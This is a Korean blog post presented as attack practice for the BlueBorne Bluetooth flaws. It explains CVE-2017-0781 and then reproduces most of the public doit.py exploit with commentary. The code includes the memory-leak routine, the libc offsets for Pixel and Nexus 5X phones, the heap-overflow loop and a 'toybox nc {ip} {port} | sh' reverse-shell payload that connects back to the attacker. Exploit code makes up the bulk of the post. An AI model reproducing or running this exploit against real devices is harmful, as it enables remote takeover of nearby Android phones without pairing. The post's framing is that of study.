[블루투스 취약점]BlueBorne 취약점과 공격실습

🌟BlueBorne 취약점

- BlueBorne 취약점은 2017에 발견된 블루투스의 대표적인 취약점 중 하나로, 다수의 CVE가 BlueBorne 취약점에 해당한다.

- 블루투스가 활성화 되어있는 장치에 공격자가 페어링하지 않아도 장치를 제어할 수 있는 공격 형태이다.

- (1)피해자 기기의 블루투스가 활성화되어있고, (2)가까운 위치에 있기만 하면 공격이 가능하다.

- 발견 당시 안드로이드, iOS, 윈도우, 리눅스, 사물인터넷 기기 등 약 53억대 이상의 기기에 영향을 미칠 수 있음이 확인되었다.

 

 

🌟BlueBorne 공격실습

BlueBorne 취약점을 공격해볼 수 있는 코드를 제공하는 깃허브 오픈소스를 찾았다.

https://github.com/mailinneberg/BlueBorne.git

GitHub - mailinneberg/BlueBorne: Purpose only! The dangers of Bluetooth implementations: Unveiling zero day vulner

 

 

아래는 제공된 공격 코드 중 CVE-2017-0781 취약점을 공략한 doit.py를 실행하는 시연영상이다.

피해자가 알아채지 못하게 기기에 연결하여 쉘을 따고, 기기를 깨우고 카메라를 실행시키고 사진 파일을 전송받기까지 하는 모습을 볼 수 있다.

 

 

 

doit.py 코드에 대해 살펴보기 전에 CVE-2017-0781 취약점에 대해 알아보자.

 

해당 취약점에 대한 Desciption은 아래와 같다.

A remote code execution vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146105.

안드로이드 시스템에서 발생한 원격 코드 실행 취약점이라고 이해하면 될 것 같다.

 

관련 CWE는 아래와 같다.

• ID: CWE-119
• 이름: Improper Restriction of Operations within the Bounds of a Memory Buffer(메모리 버퍼 내부에서의 부적절한 작업 제한)
• 설명: 메모리 버퍼에서 작업을 수행하지만, 버퍼의 의도된 경계를 벗어난 메모리 위치에서 읽거나 쓸 수 있다.
• 상세설명: 어떤 언어는 메모리 위치의 직접적인 주소를 가리키는 것을 허락하고 이 위치들이 참조하는 메모리 버퍼가 유효한가를 자동으로 보장하지 않는다. 이러한 특성으로 인해 다른 변수나 자료구조, 또는 내부 프로그램 데이터와 관련된 어떤 메모리 위치에서의 읽기 및 쓰기 작업이 이루어질 수 있다. 결과적으로, 공격자가 임의의 코드를 실행하거나, 의도된 제어흐름을 바꾸거나, 민감한 정보를 읽거나 혹은 시스템 충돌을 일으킬 수 있게 된다.
• 이같은 CWE를 부르는 다른 용어: Buffer Overflow, buffer overrun, memory safety

참고 사이트: https://nvd.nist.gov/vuln/detail/CVE-2017-0781

 

 

CVE에 대해 간략하게 알아보았다.

이제 이 취약점을 악용하여 공격을 수행하는 코드인 doit.py를 분석해보자.

 

먼저 필요한 모듈을 import하는 부분이다.

import os
import sys
import time
import struct
import select
import binascii

import bluetooth
from bluetooth import _bluetooth as bt

import bluedroid
import connectback

from pwn import log

여기에서 쓰이는 모듈을 사용하기 위해 기본적으로 pybluez와 pwntools를 설치해야 한다.

 

다음은 상수 및 설정값을 정의하는 부분이다.

# Listening TCP ports that need to be opened on the attacker machine
NC_PORT = 1233
STDOUT_PORT = 1234
STDIN_PORT = 1235


# Exploit offsets work for these (exact) libs:

# bullhead:/ # sha1sum /system/lib/hw/bluetooth.default.so
# 8a89cadfe96c0f79cdceee26c29aaf23e3d07a26  /system/lib/hw/bluetooth.default.so
# bullhead:/ # sha1sum /system/lib/libc.so
# 0b5396cd15a60b4076dacced9df773f75482f537  /system/lib/libc.so

# For Pixel 7.1.2 patch level Aug/July 2017
LIBC_TEXT_STSTEM_OFFSET = 0x45f80 + 1 - 56 # system + 1
LIBC_SOME_BLX_OFFSET = 0x1a420 + 1 - 608 # eventfd_write + 28 + 1

# For Nexus 5X 7.1.2 patch level Aug/July 2017
#LIBC_TEXT_STSTEM_OFFSET = 0x45f80 + 1
#LIBC_SOME_BLX_OFFSET = 0x1a420 + 1

# Aligned to 4 inside the name on the bss (same for both supported phones)
BSS_ACL_REMOTE_NAME_OFFSET = 0x202ee4
BLUETOOTH_BSS_SOME_VAR_OFFSET = 0x14b244

MAX_BT_NAME = 0xf5

# Payload details (attacker IP should be accessible over the internet for the victim phone)
SHELL_SCRIPT = b'toybox nc {ip} {port} | sh'


PWNING_TIMEOUT = 3
BNEP_PSM = 15
PWN_ATTEMPTS = 10
LEAK_ATTEMPTS = 5

포트번호, 사용하는 라이브러리의 오프셋 주소, 페이로드 등을 정의하고 있는 것을 확인할 수 있다.

특히 페이로드를 정의한 SHELL_SCRIPT 변수는 nc(netcat)를 이용해 지정된 IP주소와 포트에 TCP 연결을 수행한 후 sh 명령어를 수행하여 쉘을 따는 명령어를 저장하고 있는 것을 확인할 수 있다.

 

main 함수를 제외하면 미리 정의된 함수는 총 4개이다.

1. set_bt_name(payload, src_hci, src, dst)
2. set_rand_bdaddr(src_hci)
3. memory_leak_get_bases(src, src_hci, dst)
4. pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base)

각각의 함수에 대해 알아보자.

1. set_bt_name(payload, src_hci, src, dst)

• 기능: 주어진 payload를 이용하여 Bluetooth 이름을 설정한다.
• 코드는 아래와 같다.

def set_bt_name(payload, src_hci, src, dst):
    # Create raw HCI sock to set our BT name
    raw_sock = bt.hci_open_dev(bt.hci_devid(src_hci))
    flt = bt.hci_filter_new()
    bt.hci_filter_all_ptypes(flt)
    bt.hci_filter_all_events(flt)
    raw_sock.setsockopt(bt.SOL_HCI, bt.HCI_FILTER, flt)

    # Send raw HCI command to our controller to change the BT name (first 3 bytes are padding for alignment)
    raw_sock.sendall(binascii.unhexlify('01130cf8cccccc') + payload.ljust(MAX_BT_NAME, b'\x00'))
    raw_sock.close()
    #time.sleep(1)
    time.sleep(0.1)

    # Connect to BNEP to "refresh" the name (does auth)
    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.bind((src, 0))
    bnep.connect((dst, BNEP_PSM))
    bnep.close()

    # Close ACL connection
    os.system('hcitool dc %s' % (dst,))
    #time.sleep(1)

 

 

2. set_rand_bdaddr(src_hci)

• 기능: Bluetooth 장치의 랜덤 MAC 주소를 설정한다.
• 코드는 아래와 같다.

def set_rand_bdaddr(src_hci):
    addr = ['%02x' % (ord(c),) for c in os.urandom(6)]
    # NOTW: works only with CSR bluetooth adapters!
    os.system('sudo bccmd -d %s psset -r bdaddr 0x%s 0x00 0x%s 0x%s 0x%s 0x00 0x%s 0x%s' %
              (src_hci, addr[3], addr[5], addr[4], addr[2], addr[1], addr[0]))
    final_addr = ':'.join(addr)
    log.info('Set %s to new rand BDADDR %s' % (src_hci, final_addr))
    #time.sleep(1)
    while bt.hci_devid(final_addr) < 0:
        time.sleep(0.1)
    return final_addr

 

 

3. memory_leak_get_bases(src, src_hci, dst)

• 기능: 메모리 누수를 통해 주어진 Bluetooth 장치의 메모리 베이스를 얻는다.
• 코드는 아래와 같다.

def memory_leak_get_bases(src, src_hci, dst):
    prog = log.progress('Doing stack memory leak...')

    # Get leaked stack data. This memory leak gets "deterministic" "garbage" from the stack.
    result = bluedroid.do_sdp_info_leak(dst, src)

    # Calculate according to known libc.so and bluetooth.default.so binaries
    likely_some_libc_blx_offset = result[-3][-2]
    likely_some_bluetooth_default_global_var_offset = result[6][0]

    libc_text_base = likely_some_libc_blx_offset - LIBC_SOME_BLX_OFFSET
    bluetooth_default_bss_base = likely_some_bluetooth_default_global_var_offset - BLUETOOTH_BSS_SOME_VAR_OFFSET

    log.info('libc_base: 0x%08x, bss_base: 0x%08x' % (libc_text_base, bluetooth_default_bss_base))

    # Close SDP ACL connection
    os.system('hcitool dc %s' % (dst,))
    time.sleep(0.1)

    prog.success()
    return libc_text_base, bluetooth_default_bss_base

BlueBorne 취약점 공략에서의 핵심 함수로 볼 수 있을 것 같다. blueroid의 do_sdp_info_leak() 함수를 이용해서 메모리 누수를 일으키고, 메모리 누수로 가져온 메모리 오프셋을 이용해 메모리 베이스를 계산해서 얻어낸다.

 

 

4. pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base)

• 기능: Bluetooth 기기를 공격하여 쉘을 실행한다.
• 코드는 아래과 같다.

def pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base):
    # Gen new BDADDR, so that the new BT name will be cached
    src = set_rand_bdaddr(src_hci)

    # Payload is: '"\x17AAAAAAsysm";\n<bash_commands>\n#'
    # 'sysm' is the address of system() from libc. The *whole* payload is a shell script.
    # 0x1700 == (0x1722 & 0xff00) is the "event" of a "HORRIBLE_HACK" message.
    payload = struct.pack('<III', 0xAAAA1722, 0x41414141, system_addr) + b'";\n' + \
                          SHELL_SCRIPT.format(ip=my_ip, port=NC_PORT) + b'\n#'

    assert len(payload) < MAX_BT_NAME
    assert b'\x00' not in payload

    # Puts payload into a known bss location (once we create a BNEP connection).
    set_bt_name(payload, src_hci, src, dst)

    prog = log.progress('Connecting to BNEP again')

    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.bind((src, 0))
    bnep.connect((dst, BNEP_PSM))

    prog.success()
    prog = log.progress('Pwning...')

    # Each of these messages causes BNEP code to send 100 "command not understood" responses.
    # This causes list_node_t allocations on the heap (one per reponse) as items in the xmit_hold_q.
    # These items are popped asynchronously to the arrival of our incoming messages (into hci_msg_q).
    # Thus "holes" are created on the heap, allowing us to overflow a yet unhandled list_node of hci_msg_q.
    for i in range(20):
        bnep.send(binascii.unhexlify('8109' + '800109' * 100))

    # Repeatedly trigger the vuln (overflow of 8 bytes) after an 8 byte size heap buffer.
    # This is highly likely to fully overflow over instances of "list_node_t" which is exactly
    # 8 bytes long (and is *constantly* used/allocated/freed on the heap).
    # Eventually one overflow causes a call to happen to "btu_hci_msg_process" with "p_msg"
    # under our control. ("btu_hci_msg_process" is called *constantly* with messages out of a list)
    for i in range(1000):
        # If we're blocking here, the daemon has crashed
        _, writeable, _ = select.select([], [bnep], [], PWNING_TIMEOUT)
        if not writeable:
            break
        bnep.send(binascii.unhexlify('810100') +
                  struct.pack('<II', 0, acl_name_addr))
    else:
        log.info("Looks like it didn't crash. Possibly worked")

    prog.success()

아래쪽 for loop을 보면 특정 조건이 충족될 때까지 메모리 오버플로우를 일으키는 작업을 반복하다가 조건을 충족시키면 bnep.send()를 이용해 취약점을 공략하는 메시지를 피해자 기기에 전송한다.

공격에 성공하면 쉘을 따내게 된다.

 

 

 

위와 같은 함수들을 이용해서 전체 공격 흐름은 아래와 같이 이루어진다.

def main(src_hci, dst, my_ip):
    os.system('hciconfig %s sspmode 0' % (src_hci,))
    os.system('hcitool dc %s' % (dst,))

    sh_s, stdin, stdout = connectback.create_sockets(NC_PORT, STDIN_PORT, STDOUT_PORT)

    for i in range(PWN_ATTEMPTS):
        log.info('Pwn attempt %d:' % (i,))

        # Create a new BDADDR
        src = set_rand_bdaddr(src_hci)

        # Try to leak section bases
        for j in range(LEAK_ATTEMPTS):
            libc_text_base, bluetooth_default_bss_base = memory_leak_get_bases(src, src_hci, dst)
            if (libc_text_base & 0xfff == 0) and (bluetooth_default_bss_base & 0xfff == 0):
                break
        else:
           assert False, "Memory doesn't seem to have leaked as expected. Wrong .so versions?"

        system_addr = LIBC_TEXT_STSTEM_OFFSET + libc_text_base
        acl_name_addr = BSS_ACL_REMOTE_NAME_OFFSET + bluetooth_default_bss_base
        assert acl_name_addr % 4 == 0
        log.info('system: 0x%08x, acl_name: 0x%08x' % (system_addr, acl_name_addr))

        pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base)
        # Check if we got a connectback
        readable, _, _ = select.select([sh_s], [], [], PWNING_TIMEOUT)
        if readable:
            log.info('Done')
            break

    else:
        assert False, "Pwning failed all attempts"

    connectback.interactive_shell(sh_s, stdin, stdout, my_ip, STDIN_PORT, STDOUT_PORT)

 

 

 

여기까지

BlueBorne 취약점에 대해 알아보고,

BlueBorne 취약점에 해당하는 CVE 중 하나인 CVE-2017-0781에 대해 알아보고

해당 CVE를 공략하여 공격을 수행하는 코드에 대해 살펴보았다.

 

아직 코드를 깊이 분석하기에는 실력이 모자라지만 추후에 충분한 시간을 갖고 더 자세히 코드를 분석해보고 싶다.